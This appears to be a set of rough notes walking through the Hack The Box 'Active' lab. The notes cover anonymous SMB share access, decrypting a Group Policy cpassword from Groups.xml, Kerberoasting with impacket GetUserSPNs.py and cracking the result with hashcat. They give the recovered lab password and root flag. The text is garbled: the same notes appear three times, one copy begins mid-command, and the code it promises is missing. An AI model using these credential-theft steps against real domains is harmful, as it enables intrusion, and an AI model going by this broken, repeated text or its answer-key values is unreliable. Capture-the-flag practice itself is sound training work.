                                                                                                                                                            
┌──(kali㉿kali)-[~/HTB/Active]

Root flag b74a82c6fd9308eadeb3be8c43a6e766

| xargs grep categories | grep 'default\|version' | grep smb /usr/share/nmap/scripts/smb-os-discovery.nse:categories = {"default", "discovery", "safe"} /usr/share/nmap/scripts/smb-security-mode.nse:categories = {"default", "discovery", "safe"} /usr/share/nmap/scripts/smb2-security-mode.nse:categories = {"safe", "discovery", "default"} /usr/share/nmap/scripts/smb2-time.nse:categories = {"discovery", "safe", "default"} 

if you want to check what also is included with the “safe” catagory;


so if you want to just run the safe alone we can use nmap –script safe -p 445 10.10.10.100


Nothing much got from the above

Use SMBclient to list shares with nulll password


Recursively check the Replication folder using Smbmap smbmap -r Replication -H 10.10.10.100. This failed


Going to try impacket smbclient.py with the command **smbclient.py ‘@IP_ADDRESS’ -share SHARE_NAME -command ‘recurse ON; prompt OFF; mget *’

The above command did not work

Used the following smbclient command smbclient //10.10.10.100/Replication -U “”%””


From ChatGPT

  • Groups.xml: The Groups.xml file could contain information about local group policies, including potentially sensitive information like usernames and even encrypted passwords.
  • Groups.xml: You might find information on users or even passwords that you can decrypt and use for privilege escalation.

Searching for this file after it downloaded with the mget


Found a python utility online. The python codo is as below. You need tyo install pycryptodome


The python code


Replace the cpassword in the python


Run the python script


Connect to the shartes using smbclient with the username and the password


use the impacket GetUserSPNs.py




Using hashcat and rockyou


Passwword is Ticketmaster1968

Connect with smbclient


Root flag b74a82c6fd9308eadeb3be8c43a6e766

| xargs grep categories | grep 'default\|version\|safe' | grep smb /usr/share/nmap/scripts/smb-double-pulsar-backdoor.nse:categories = {"vuln", "safe", "malware"} /usr/share/nmap/scripts/smb-enum-services.nse:categories = {"discovery","intrusive","safe"} /usr/share/nmap/scripts/smb-ls.nse:categories = {"discovery", "safe"} /usr/share/nmap/scripts/smb-mbenum.nse:categories = {"discovery", "safe"} /usr/share/nmap/scripts/smb-os-discovery.nse:categories = {"default", "discovery", "safe"} /usr/share/nmap/scripts/smb-protocols.nse:categories = {"safe", "discovery"} /usr/share/nmap/scripts/smb-security-mode.nse:categories = {"default", "discovery", "safe"} /usr/share/nmap/scripts/smb-vuln-ms17-010.nse:categories = {"vuln", "safe"} /usr/share/nmap/scripts/smb2-capabilities.nse:categories = {"safe", "discovery"} /usr/share/nmap/scripts/smb2-security-mode.nse:categories = {"safe", "discovery", "default"} /usr/share/nmap/scripts/smb2-time.nse:categories = {"discovery", "safe", "default"} /usr/share/nmap/scripts/smb2-vuln-uptime.nse:categories = {"vuln", "safe"} 

so if you want to just run the safe alone we can use nmap –script safe -p 445 10.10.10.100


Nothing much got from the above

Use SMBclient to list shares with nulll password


Recursively check the Replication folder using Smbmap smbmap -r Replication -H 10.10.10.100. This failed


Going to try impacket smbclient.py with the command **smbclient.py ‘@IP_ADDRESS’ -share SHARE_NAME -command ‘recurse ON; prompt OFF; mget *’

The above command did not work

Used the following smbclient command smbclient //10.10.10.100/Replication -U “”%””


From ChatGPT

  • Groups.xml: The Groups.xml file could contain information about local group policies, including potentially sensitive information like usernames and even encrypted passwords.
  • Groups.xml: You might find information on users or even passwords that you can decrypt and use for privilege escalation.

Searching for this file after it downloaded with the mget


Found a python utility online. The python codo is as below. You need tyo install pycryptodome


The python code


Replace the cpassword in the python


Run the python script


Connect to the shartes using smbclient with the username and the password


use the impacket GetUserSPNs.py




Using hashcat and rockyou


Passwword is Ticketmaster1968

Connect with smbclient


Root flag b74a82c6fd9308eadeb3be8c43a6e766

| xargs grep categories | grep ‘default\|version’ | grep smb /usr/share/nmap/scripts/smb-os-discovery.nse:categories = {“default”, “discovery”, “safe”} /usr/share/nmap/scripts/smb-security-mode.nse:categories = {“default”, “discovery”, “safe”} /usr/share/nmap/scripts/smb2-security-mode.nse:categories = {“safe”, “discovery”, “default”} /usr/share/nmap/scripts/smb2-time.nse:categories = {“discovery”, “safe”, “default”}

if you want to check what also is included with the “safe” catagory;


so if you want to just run the safe alone we can use nmap –script safe -p 445 10.10.10.100


Nothing much got from the above

Use SMBclient to list shares with nulll password


Recursively check the Replication folder using Smbmap smbmap -r Replication -H 10.10.10.100. This failed


Going to try impacket smbclient.py with the command **smbclient.py ‘@IP_ADDRESS’ -share SHARE_NAME -command ‘recurse ON; prompt OFF; mget *’

The above command did not work

Used the following smbclient command smbclient //10.10.10.100/Replication -U “”%””


From ChatGPT

  • Groups.xml: The Groups.xml file could contain information about local group policies, including potentially sensitive information like usernames and even encrypted passwords.
  • Groups.xml: You might find information on users or even passwords that you can decrypt and use for privilege escalation.

Searching for this file after it downloaded with the mget


Found a python utility online. The python codo is as below. You need tyo install pycryptodome


The python code


Replace the cpassword in the python


Run the python script


Connect to the shartes using smbclient with the username and the password


use the impacket GetUserSPNs.py




Using hashcat and rockyou


Passwword is Ticketmaster1968

Connect with smbclient


Root flag b74a82c6fd9308eadeb3be8c43a6e766